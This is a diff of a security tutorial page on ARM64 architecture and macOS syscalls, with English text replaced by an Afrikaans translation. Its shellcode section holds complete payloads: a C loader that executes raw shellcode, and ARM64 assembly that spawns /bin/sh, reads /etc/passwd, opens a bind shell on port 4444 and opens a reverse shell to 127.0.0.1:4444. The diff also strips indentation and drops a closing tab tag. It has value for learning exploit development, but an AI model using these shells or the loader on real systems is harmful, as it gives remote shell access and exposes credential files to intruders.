skakelregister en raamverwysing**: {% code overflow="wrap" %} ```armasm @@ -222,87 +188,83 @@ ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment th ``` {% endcode %} -3. **Return**: `ret` (returns control to the caller using the address in the link register) +3. **Terugkeer**: `ret` (gee beheer terug aan die oproeper deur die adres in die skakelregister te gebruik) -## AARCH32 Execution State +## AARCH32 Uitvoeringsstatus -Armv8-A support the execution of 32-bit programs. **AArch32** can run in one of **two instruction sets**: **`A32`** and **`T32`** and can switch between them via **`interworking`**.\ -**Privileged** 64-bit programs can schedule the **execution of 32-bit** programs by executing a exception level transfer to the lower privileged 32-bit.\ -Note that the transition from 64-bit to 32-bit occurs with a lower of the exception level (for example a 64-bit program in EL1 triggering a program in EL0). This is done by setting the **bit 4 of** **`SPSR_ELx`** special register **to 1** when the `AArch32` process thread is ready to be executed and the rest of `SPSR_ELx` stores the **`AArch32`** programs CPSR. Then, the privileged process calls the **`ERET`** instruction so the processor transitions to **`AArch32`** entering in A32 or T32 depending on CPSR**.** +Armv8-A ondersteun die uitvoering van 32-bis-programme. **AArch32** kan in een van **twee instruksiestelle** uitgevoer word: **`A32`** en **`T32`**, en kan tussen hulle skakel deur middel van **`interworking`**.\ +**Bevoorregte** 64-bis-programme kan die **uitvoering van 32-bis-programme skeduleer** deur 'n uitsonderingsvlak-oordrag na die laer bevoorregte 32-bis-program uit te voer.\ +Let daarop dat die oorgang van 64-bis na 32-bis plaasvind met 'n verlaging van die uitsonderingsvlak (byvoorbeeld 'n 64-bis-program in EL1 wat 'n program in EL0 teweegbring). Dit word gedoen deur die **bit 4 van** **`SPSR_ELx`** spesiale register **op 1** te stel wanneer die `AArch32` prosesdraad gereed is om uitgevoer te word, en die res van `SPSR_ELx` stoor die **`AArch32`** programme se CPSR. Dan roep die bevoorregte proses die **`ERET`** instruksie aan sodat die verwerker oorgaan na **`AArch32`** en in A32 of T32 binnegaan, afhangende van CPSR**.** -The **`interworking`** occurs using the J and T bits of CPSR. `J=0` and `T=0` means **`A32`** and `J=0` and `T=1` means **T32**. This basically traduces on setting the **lowest bit to 1** to indicate the instruction set is T32.\ -This is set during the **interworking branch instructions,** but can also be set directly with other instructions when the PC is set as the destination register. Example: - -Another example: +Die **`interworking`** vind plaas deur die J- en T-bits van CPSR te gebruik. `J=0` en `T=0` beteken **`A32`** en `J=0` en `T=1` beteken **T32**. Dit kom neer op die stelling van die **laagste bit as 1** om aan te dui dat die instruksiestel T32 is.\ +Dit word ingestel tydens die **interworking takinstruksies**, maar kan ook direk met ander instruksies ingestel word wanneer die PC as die bestemmingsregister ingestel word. Voorbeeld: +'n Ander voorbeeld: ```armasm _start: .code 32 ; Begin using A32 - add r4, pc, #1 ; Here PC is already pointing to "mov r0, #0" - bx r4 ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32) +add r4, pc, #1 ; Here PC is already pointing to "mov r0, #0" +bx r4 ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32) .code 16: - mov r0, #0 - mov r0, #8 +mov r0, #0 +mov r0, #8 ``` - ### Registers -There are 16 32-bit registers (r0-r15). **From r0 to r14** they can be used for **any operation**, however some of them are usually reserved: +Daar is 16 32-bit registers (r0-r15). Vanaf r0 tot r14 kan hulle gebruik word vir enige operasie, maar sommige van hulle is gewoonlik gereserveer: -* **`r15`**: Program counter (always). Contains the address of the next instruction. In A32 current + 8, in T32, current + 4. -* **`r11`**: Frame Pointer -* **`r12`**: Intra-procedural call register -* **`r13`**: Stack Pointer -* **`r14`**: Link Register +- `r15`: Programteller (altyd). Bevat die adres van die volgende instruksie. In A32 huidige + 8, in T32, huidige + 4. +- `r11`: Raampunt +- `r12`: Intra-prosedurale oproepregister +- `r13`: Stakpunt +- `r14`: Skakelregister -Moreover, registers are backed up in **`banked registries`**. Which are places that store the registers values allowing to perform **fast context switching** in exception handling and privileged operations to avoid the need to manually save and restore registers every time.\ -This is done by **saving the processor state from the `CPSR` to the `SPSR`** of the processor mode to which the exception is taken. On the exception returns, the **`CPSR`** is restored from the **`SPSR`**. +Verder word registerwaardes ondersteun in "gebankte registre". Dit is plekke wat die registerwaardes stoor om vinnige kontekswisseling in uitsonderingshantering en bevoorregte operasies moontlik te maak, om die nodigheid om registerwaardes handmatig te stoor en herstel te vermy. Dit word gedoen deur die prosessorstatus van die CPSR na die SPSR van die prosessormodus waarin die uitsondering geneem word, te stoor. By die terugkeer van die uitsondering word die CPSR herstel vanaf die SPSR. -### CPSR - Current Program Status Register +### CPSR - Huidige Programstatusregister -In AArch32 the CPSR works similar to **`PSTATE`** in AArch64 and is also stored in **`SPSR_ELx`** when a exception is taken to restore later the execution: +In AArch32 werk die CPSR soortgelyk aan PSTATE in AArch64 en word dit ook gestoor in SPSR_ELx wanneer 'n uitsondering geneem word om die uitvoering later te herstel:
-The fields are divided in some groups: +Die velde is verdeel in verskeie groepe: -* Application Program Status Register (APSR): Arithmetic flags and accesible from EL0 -* Execution State Registers: Process behaviour (managed by the OS). +- Application Program Status Register (APSR): Aritmetiese vlae en toeganklik vanaf EL0 +- Uitvoeringsstatusregisters: Prosessgedrag (bestuur deur die bedryfstelsel). #### Application Program Status Register (APSR) -* The **`N`**, **`Z`**, **`C`**, **`V`** flags (just like in AArch64) -* The **`Q`** flag: It's set to 1 whenever **integer saturation occurs** during the execution of a specialized saturating arithmetic instruction. Once it's set to **`1`**, it'll maintain the value until it's manually set to 0. Moreover, there isn't any instruction that checks its value implicitly, it must be done reading it manually. -* **`GE`** (Greater than or equal) Flags: It's used in SIMD (Single Instruction, Multiple Data) operations, such as "parallel add" and "parallel subtract". These operations allow processing multiple data points in a single instruction. +- Die `N`, `Z`, `C`, `V`-vlae (soos in AArch64) +- Die `Q`-vlaag: Dit word op 1 gestel wanneer daar tydens die uitvoering van 'n gespesialiseerde versadigende aritmetiese instruksie **integer versadiging plaasvind**. Sodra dit op `1` gestel is, sal dit die waarde behou totdat dit handmatig op 0 gestel word. Daar is ook geen instruksie wat sy waarde implisiet toets nie, dit moet handmatig gelees word. +- `GE` (Groter as of gelyk aan) Vlae: Dit word gebruik in SIMD (Enkele Instruksie, Meervoudige Data) operasies, soos "parallelle optelling" en "parallelle aftrekking". Hierdie operasies maak dit moontlik om meerdere datapunte in een instruksie te verwerk. - For example, the **`UADD8`** instruction **adds four pairs of bytes** (from two 32-bit operands) in parallel and stores the results in a 32-bit register. It then **sets the `GE` flags in the `APSR`** based on these results. Each GE flag corresponds to one of the byte additions, indicating if the addition for that byte pair **overflowed**. +Byvoorbeeld, die `UADD8`-instruksie tel vier pare byte (vanaf twee 32-bit operandi) parallel op en stoor die resultate in 'n 32-bit register. Dit stel dan die `GE`-vlae in die `APSR` in op grond van hierdie resultate. Elke GE-vlag stem ooreen met een van die byte-optellings en dui aan of die optelling vir daardie bytepaar **oorvloei** het. - The **`SEL`** instruction uses these GE flags to perform conditional actions. +Die `SEL`-instruksie gebruik hierdie GE-vlae om voorwaardelike aksies uit te voer. -#### Execution State Registers +#### Uitvoeringsstatusregisters -* The **`J`** and **`T`** bits: **`J`** should be 0 and if **`T`** is 0 the instruction set A32 is used, and if it's 1, the T32 is used. -* **IT Block State Register** (`ITSTATE`): These are the bits from 10-15 and 25-26. They store conditions for instructions inside an **`IT`** prefixed group. -* **`E`** bit: Indicates the **endianness**. -* **Mode and Exception Mask Bits** (0-4): They determine the current execution state. The **5th** one indicates if the program runs as 32bit (a 1) or 64bit (a 0). The other 4 represents the **exception mode currently in used** (when a exception occurs and it's being handled). The number set **indicates the current priority** in case another exception is triggered while this is being handled. +- Die `J`- en `T`-bits: `J` moet 0 wees en as `T` 0 is, word die A32-instruksiestel gebruik, en as dit 1 is, word die T32 gebruik. +- IT Blokstatusregister (`ITSTATE`): Dit is die bits vanaf 10-15 en 25-26. Hulle stoor voorwaardes vir instruksies binne 'n `IT`-voorafgegaan groep. +- `E`-bit: Dui die **endianness** aan. +- Modus- en Uitsonderingsmasker-bits (0-4): Hulle bepaal die huidige uitvoeringsstatus. Die vyfde een dui aan of die program as 32-bit (1) of 64-bit (0) uitgevoer word. Die ander 4 verteenwoordig die tans gebruikte uitsonderingsmodus (wanneer 'n uitsondering plaasvind en hanteer word). Die getalstel dui die huidige prioriteit aan in die geval 'n ander uitsondering geaktiveer word terwyl hierdie een hanteer word.
-* **`AIF`**: Certain exceptions can be disabled using the bits **`A`**, `I`, `F`. If **`A`** is 1 it means **asynchronous aborts** will be triggered. The **`I`** configures to respond to external hardware **Interrupts Requests** (IRQs). and the F is related to **Fast Interrupt Requests** (FIRs). +- `AIF`: Sekere uitsonderings kan gedeaktiveer word deur die bits `A`, `I`, `F` te gebruik. As `A` 1 is, beteken dit dat asynchrone afbreek geaktiveer sal word. Die `I` stel dit in om te reageer op eksterne hardeware-onderbrekingsversoeke (IRQ's). En die F is verband hou met vinnige onderbrekingsversoeke (FIR's). ## macOS -### BSD syscalls +### BSD-sysoproepe -Check out [**syscalls.master**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master). BSD syscalls will have **x16 > 0**. +Kyk na [**syscalls.master**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master). BSD-sysoproepe sal hê **x16 > 0**. ### Mach Traps -Check out [**syscall\_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall\_sw.c.auto.html). Mach traps will have **x16 < 0**, so you need to call the numbers from the previous list with a **minus**: **`_kernelrpc_mach_vm_allocate_trap`** is **`-10`**. - -You can also check **`libsystem_kernel.dylib`** in a disassembler to find how to call these (and BSD) syscalls: +Kyk na [**syscall\_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall\_sw.c.auto.html). Mach traps sal hê **x16 < 0**, so jy moet die nommers van die vorige lys met 'n min-teken noem: **`_kernelrpc_mach_vm_allocate_trap`** is **`-10`**. +Jy kan ook **`libsystem_kernel.dylib`** in 'n disassembler nagaan om uit te vind hoe om hierdie (en BSD) sysoproepe te noem: ```bash # macOS dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e @@ -310,15 +272,13 @@ dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Lib # iOS dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64 ``` - {% hint style="success" %} -Sometimes it's easier to check the **decompiled** code from **`libsystem_kernel.dylib`** **than** checking the **source code** becasue the code of several syscalls (BSD and Mach) are generated via scripts (check comments in the source code) while in the dylib you can find what is being called. +Soms is dit makliker om die **gedekomponeerde** kode van **`libsystem_kernel.dylib`** te kontroleer as om die **bronkode** te kontroleer, omdat die kode van verskeie syscalls (BSD en Mach) gegenereer word deur skripte (kyk na kommentaar in die bronkode), terwyl jy in die dylib kan vind wat geroep word. {% endhint %} -### Shellcodes - -To compile: +### Shellkodes +Om te kompileer: ```bash as -o shell.o shell.s ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib @@ -326,20 +286,16 @@ ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/Comm # You could also use this ld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem ``` - -To extract the bytes: - +Om die bytes te onttrek: ```bash # Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do - echo -n '\\x'$c +echo -n '\\x'$c done ``` -
-C code to test the shellcode - +C-kode om die shellcode te toets ```c // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c // gcc loader.c -o loader @@ -353,161 +309,155 @@ int (*sc)(); char shellcode[] = ""; int main(int argc, char **argv) { - printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode)); - - void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); - - if (ptr == MAP_FAILED) { - perror("mmap"); - exit(-1); - } - printf("[+] SUCCESS: mmap\n"); - printf(" |-> Return = %p\n", ptr); - - void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); - printf("[+] SUCCESS: memcpy\n"); - printf(" |-> Return = %p\n", dst); +printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode)); - int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); +void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); - if (status == -1) { - perror("mprotect"); - exit(-1); - } - printf("[+] SUCCESS: mprotect\n"); - printf(" |-> Return = %d\n", status); +if (ptr == MAP_FAILED) { +perror("mmap"); +exit(-1); +} +printf("[+] SUCCESS: mmap\n"); +printf(" |-> Return = %p\n", ptr); - printf("[>] Trying to execute shellcode...\n"); +void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); +printf("[+] SUCCESS: memcpy\n"); +printf(" |-> Return = %p\n", dst); - sc = ptr; - sc(); - - return 0; +int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); + +if (status == -1) { +perror("mprotect"); +exit(-1); +} +printf("[+] SUCCESS: mprotect\n"); +printf(" |-> Return = %d\n", status); + +printf("[>] Trying to execute shellcode...\n"); + +sc = ptr; +sc(); + +return 0; } ``` -
-#### Shell +#### Skulp -Taken from [**here**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) and explained. +Geneem van [**hier**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) en verduidelik. {% tabs %} -{% tab title="with adr" %} -```armasm -.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment. -.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program. -.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). - -_main: - adr x0, sh_path ; This is the address of "/bin/sh". - mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve. - mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve. - mov x16, #59 ; Move the execve syscall number (59) into x16. - svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. - -sh_path: .asciz "/bin/sh" -``` -{% endtab %} - -{% tab title="with stack" %} +{% tab title="met adr" %} ```armasm .section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment. .global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program. .align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). _main: - ; We are going to build the string "/bin/sh" and place it on the stack. - - mov x1, #0x622F ; Move the lower half of "/bi" into x1. 0x62 = 'b', 0x2F = '/'. - movk x1, #0x6E69, lsl #16 ; Move the next half of "/bin" into x1, shifted left by 16. 0x6E = 'n', 0x69 = 'i'. - movk x1, #0x732F, lsl #32 ; Move the first half of "/sh" into x1, shifted left by 32. 0x73 = 's', 0x2F = '/'. - movk x1, #0x68, lsl #48 ; Move the last part of "/sh" into x1, shifted left by 48. 0x68 = 'h'. +adr x0, sh_path ; This is the address of "/bin/sh". +mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve. +mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve. +mov x16, #59 ; Move the execve syscall number (59) into x16. +svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. - str x1, [sp, #-8] ; Store the value of x1 (the "/bin/sh" string) at the location `sp - 8`. +sh_path: .asciz "/bin/sh" +``` +{% tab title="met stapel" %} +```armasm +.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment. +.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program. +.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). - ; Prepare arguments for the execve syscall. - - mov x1, #8 ; Set x1 to 8. - sub x0, sp, x1 ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of "/bin/sh" string on the stack. - mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve. - mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve. +_main: +; We are going to build the string "/bin/sh" and place it on the stack. - ; Make the syscall. - - mov x16, #59 ; Move the execve syscall number (59) into x16. - svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. +mov x1, #0x622F ; Move the lower half of "/bi" into x1. 0x62 = 'b', 0x2F = '/'. +movk x1, #0x6E69, lsl #16 ; Move the next half of "/bin" into x1, shifted left by 16. 0x6E = 'n', 0x69 = 'i'. +movk x1, #0x732F, lsl #32 ; Move the first half of "/sh" into x1, shifted left by 32. 0x73 = 's', 0x2F = '/'. +movk x1, #0x68, lsl #48 ; Move the last part of "/sh" into x1, shifted left by 48. 0x68 = 'h'. + +str x1, [sp, #-8] ; Store the value of x1 (the "/bin/sh" string) at the location `sp - 8`. + +; Prepare arguments for the execve syscall. + +mov x1, #8 ; Set x1 to 8. +sub x0, sp, x1 ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of "/bin/sh" string on the stack. +mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve. +mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve. + +; Make the syscall. + +mov x16, #59 ; Move the execve syscall number (59) into x16. +svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. ``` {% endtab %} {% endtabs %} -#### Read with cat - -The goal is to execute `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, so the second argument (x1) is an array of params (which in memory these means a stack of the addresses). +#### Lees met kat +Die doel is om `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)` uit te voer, so die tweede argument (x1) is 'n reeks van parameters (wat in die geheue 'n stapel van die adresse beteken). ```armasm .section __TEXT,__text ; Begin a new section of type __TEXT and name __text .global _main ; Declare a global symbol _main .align 2 ; Align the beginning of the following code to a 4-byte boundary _main: - ; Prepare the arguments for the execve syscall - sub sp, sp, #48 ; Allocate space on the stack - mov x1, sp ; x1 will hold the address of the argument array - adr x0, cat_path - str x0, [x1] ; Store the address of "/bin/cat" as the first argument - adr x0, passwd_path ; Get the address of "/etc/passwd" - str x0, [x1, #8] ; Store the address of "/etc/passwd" as the second argument - str xzr, [x1, #16] ; Store NULL as the third argument (end of arguments) - - adr x0, cat_path - mov x2, xzr ; Clear x2 to hold NULL (no environment variables) - mov x16, #59 ; Load the syscall number for execve (59) into x8 - svc 0 ; Make the syscall +; Prepare the arguments for the execve syscall +sub sp, sp, #48 ; Allocate space on the stack +mov x1, sp ; x1 will hold the address of the argument array +adr x0, cat_path +str x0, [x1] ; Store the address of "/bin/cat" as the first argument +adr x0, passwd_path ; Get the address of "/etc/passwd" +str x0, [x1, #8] ; Store the address of "/etc/passwd" as the second argument +str xzr, [x1, #16] ; Store NULL as the third argument (end of arguments) + +adr x0, cat_path +mov x2, xzr ; Clear x2 to hold NULL (no environment variables) +mov x16, #59 ; Load the syscall number for execve (59) into x8 +svc 0 ; Make the syscall cat_path: .asciz "/bin/cat" .align 2 passwd_path: .asciz "/etc/passwd" ``` - -#### Invoke command with sh from a fork so the main process is not killed - +#### Roep die bevel aan met sh vanuit 'n vurk sodat die hoofproses nie doodgemaak word nie ```armasm .section __TEXT,__text ; Begin a new section of type __TEXT and name __text .global _main ; Declare a global symbol _main .align 2 ; Align the beginning of the following code to a 4-byte boundary _main: - ; Prepare the arguments for the fork syscall - mov x16, #2 ; Load the syscall number for fork (2) into x8 - svc 0 ; Make the syscall - cmp x1, #0 ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html - beq _loop ; If not child process, loop +; Prepare the arguments for the fork syscall +mov x16, #2 ; Load the syscall number for fork (2) into x8 +svc 0 ; Make the syscall +cmp x1, #0 ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html +beq _loop ; If not child process, loop - ; Prepare the arguments for the execve syscall +; Prepare the arguments for the execve syscall - sub sp, sp, #64 ; Allocate space on the stack - mov x1, sp ; x1 will hold the address of the argument array - adr x0, sh_path - str x0, [x1] ; Store the address of "/bin/sh" as the first argument - adr x0, sh_c_option ; Get the address of "-c" - str x0, [x1, #8] ; Store the address of "-c" as the second argument - adr x0, touch_command ; Get the address of "touch /tmp/lalala" - str x0, [x1, #16] ; Store the address of "touch /tmp/lalala" as the third argument - str xzr, [x1, #24] ; Store NULL as the fourth argument (end of arguments) - - adr x0, sh_path - mov x2, xzr ; Clear x2 to hold NULL (no environment variables) - mov x16, #59 ; Load the syscall number for execve (59) into x8 - svc 0 ; Make the syscall +sub sp, sp, #64 ; Allocate space on the stack +mov x1, sp ; x1 will hold the address of the argument array +adr x0, sh_path +str x0, [x1] ; Store the address of "/bin/sh" as the first argument +adr x0, sh_c_option ; Get the address of "-c" +str x0, [x1, #8] ; Store the address of "-c" as the second argument +adr x0, touch_command ; Get the address of "touch /tmp/lalala" +str x0, [x1, #16] ; Store the address of "touch /tmp/lalala" as the third argument +str xzr, [x1, #24] ; Store NULL as the fourth argument (end of arguments) + +adr x0, sh_path +mov x2, xzr ; Clear x2 to hold NULL (no environment variables) +mov x16, #59 ; Load the syscall number for execve (59) into x8 +svc 0 ; Make the syscall _exit: - mov x16, #1 ; Load the syscall number for exit (1) into x8 - mov x0, #0 ; Set exit status code to 0 - svc 0 ; Make the syscall +mov x16, #1 ; Load the syscall number for exit (1) into x8 +mov x0, #0 ; Set exit status code to 0 +svc 0 ; Make the syscall _loop: b _loop @@ -517,174 +467,169 @@ sh_c_option: .asciz "-c" .align 2 touch_command: .asciz "touch /tmp/lalala" ``` +#### Bind skulp -#### Bind shell - -Bind shell from [https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s](https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s) in **port 4444** - +Bind skulp vanaf [https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s](https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s) in **poort 4444** ```armasm .section __TEXT,__text .global _main .align 2 _main: call_socket: - // s = socket(AF_INET = 2, SOCK_STREAM = 1, 0) - mov x16, #97 - lsr x1, x16, #6 - lsl x0, x1, #1 - mov x2, xzr - svc #0x1337 +// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0) +mov x16, #97 +lsr x1, x16, #6 +lsl x0, x1, #1 +mov x2, xzr +svc #0x1337 - // save s - mvn x3, x0 +// save s +mvn x3, x0 call_bind: - /* - * bind(s, &sockaddr, 0x10) - * - * struct sockaddr_in { - * __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10 - * sa_family_t sin_family; // AF_INET = 2 - * in_port_t sin_port; // 4444 = 0x115C - * struct in_addr sin_addr; // 0.0.0.0 (4 bytes) - * char sin_zero[8]; // Don't care - * }; - */ - mov x1, #0x0210 - movk x1, #0x5C11, lsl #16 - str x1, [sp, #-8] - mov x2, #8 - sub x1, sp, x2 - mov x2, #16 - mov x16, #104 - svc #0x1337 +/* +* bind(s, &sockaddr, 0x10) +* +* struct sockaddr_in { +* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10 +* sa_family_t sin_family; // AF_INET = 2 +* in_port_t sin_port; // 4444 = 0x115C +* struct in_addr sin_addr; // 0.0.0.0 (4 bytes) +* char sin_zero[8]; // Don't care +* }; +*/ +mov x1, #0x0210 +movk x1, #0x5C11, lsl #16 +str x1, [sp, #-8] +mov x2, #8 +sub x1, sp, x2 +mov x2, #16 +mov x16, #104 +svc #0x1337 call_listen: - // listen(s, 2) - mvn x0, x3 - lsr x1, x2, #3 - mov x16, #106 - svc #0x1337 +// listen(s, 2) +mvn x0, x3 +lsr x1, x2, #3 +mov x16, #106 +svc #0x1337 call_accept: - // c = accept(s, 0, 0) - mvn x0, x3 - mov x1, xzr - mov x2, xzr - mov x16, #30 - svc #0x1337 +// c = accept(s, 0, 0) +mvn x0, x3 +mov x1, xzr +mov x2, xzr +mov x16, #30 +svc #0x1337 - mvn x3, x0 - lsr x2, x16, #4 - lsl x2, x2, #2 +mvn x3, x0 +lsr x2, x16, #4 +lsl x2, x2, #2 call_dup: - // dup(c, 2) -> dup(c, 1) -> dup(c, 0) - mvn x0, x3 - lsr x2, x2, #1 - mov x1, x2 - mov x16, #90 - svc #0x1337 - mov x10, xzr - cmp x10, x2 - bne call_dup +// dup(c, 2) -> dup(c, 1) -> dup(c, 0) +mvn x0, x3 +lsr x2, x2, #1 +mov x1, x2 +mov x16, #90 +svc #0x1337 +mov x10, xzr +cmp x10, x2 +bne call_dup call_execve: - // execve("/bin/sh", 0, 0) - mov x1, #0x622F - movk x1, #0x6E69, lsl #16 - movk x1, #0x732F, lsl #32 - movk x1, #0x68, lsl #48 - str x1, [sp, #-8] - mov x1, #8 - sub x0, sp, x1 - mov x1, xzr - mov x2, xzr - mov x16, #59 - svc #0x1337 +// execve("/bin/sh", 0, 0) +mov x1, #0x622F +movk x1, #0x6E69, lsl #16 +movk x1, #0x732F, lsl #32 +movk x1, #0x68, lsl #48 +str x1, [sp, #-8] +mov x1, #8 +sub x0, sp, x1 +mov x1, xzr +mov x2, xzr +mov x16, #59 +svc #0x1337 ``` +#### Omgekeerde skulp -#### Reverse shell - -From [https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/reverseshell.s](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/reverseshell.s), revshell to **127.0.0.1:4444** - +Vanaf [https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/reverseshell.s](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/reverseshell.s), revshell na **127.0.0.1:4444** ```armasm .section __TEXT,__text .global _main .align 2 _main: call_socket: - // s = socket(AF_INET = 2, SOCK_STREAM = 1, 0) - mov x16, #97 - lsr x1, x16, #6 - lsl x0, x1, #1 - mov x2, xzr - svc #0x1337 +// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0) +mov x16, #97 +lsr x1, x16, #6 +lsl x0, x1, #1 +mov x2, xzr +svc #0x1337 - // save s - mvn x3, x0 +// save s +mvn x3, x0 call_connect: - /* - * connect(s, &sockaddr, 0x10) - * - * struct sockaddr_in { - * __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10 - * sa_family_t sin_family; // AF_INET = 2 - * in_port_t sin_port; // 4444 = 0x115C - * struct in_addr sin_addr; // 127.0.0.1 (4 bytes) - * char sin_zero[8]; // Don't care - * }; - */ - mov x1, #0x0210 - movk x1, #0x5C11, lsl #16 - movk x1, #0x007F, lsl #32 - movk x1, #0x0100, lsl #48 - str x1, [sp, #-8] - mov x2, #8 - sub x1, sp, x2 - mov x2, #16 - mov x16, #98 - svc #0x1337 +/* +* connect(s, &sockaddr, 0x10) +* +* struct sockaddr_in { +* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10 +* sa_family_t sin_family; // AF_INET = 2 +* in_port_t sin_port; // 4444 = 0x115C +* struct in_addr sin_addr; // 127.0.0.1 (4 bytes) +* char sin_zero[8]; // Don't care +* }; +*/ +mov x1, #0x0210 +movk x1, #0x5C11, lsl #16 +movk x1, #0x007F, lsl #32 +movk x1, #0x0100, lsl #48 +str x1, [sp, #-8] +mov x2, #8 +sub x1, sp, x2 +mov x2, #16 +mov x16, #98 +svc #0x1337 - lsr x2, x2, #2 +lsr x2, x2, #2 call_dup: - // dup(s, 2) -> dup(s, 1) -> dup(s, 0) - mvn x0, x3 - lsr x2, x2, #1 - mov x1, x2 - mov x16, #90 - svc #0x1337 - mov x10, xzr - cmp x10, x2 - bne call_dup +// dup(s, 2) -> dup(s, 1) -> dup(s, 0) +mvn x0, x3 +lsr x2, x2, #1 +mov x1, x2 +mov x16, #90 +svc #0x1337 +mov x10, xzr +cmp x10, x2 +bne call_dup call_execve: - // execve("/bin/sh", 0, 0) - mov x1, #0x622F - movk x1, #0x6E69, lsl #16 - movk x1, #0x732F, lsl #32 - movk x1, #0x68, lsl #48 - str x1, [sp, #-8] - mov x1, #8 - sub x0, sp, x1 - mov x1, xzr - mov x2, xzr - mov x16, #59 - svc #0x1337 +// execve("/bin/sh", 0, 0) +mov x1, #0x622F +movk x1, #0x6E69, lsl #16 +movk x1, #0x732F, lsl #32 +movk x1, #0x68, lsl #48 +str x1, [sp, #-8] +mov x1, #8 +sub x0, sp, x1 +mov x1, xzr +mov x2, xzr +mov x16, #59 +svc #0x1337 ``` -
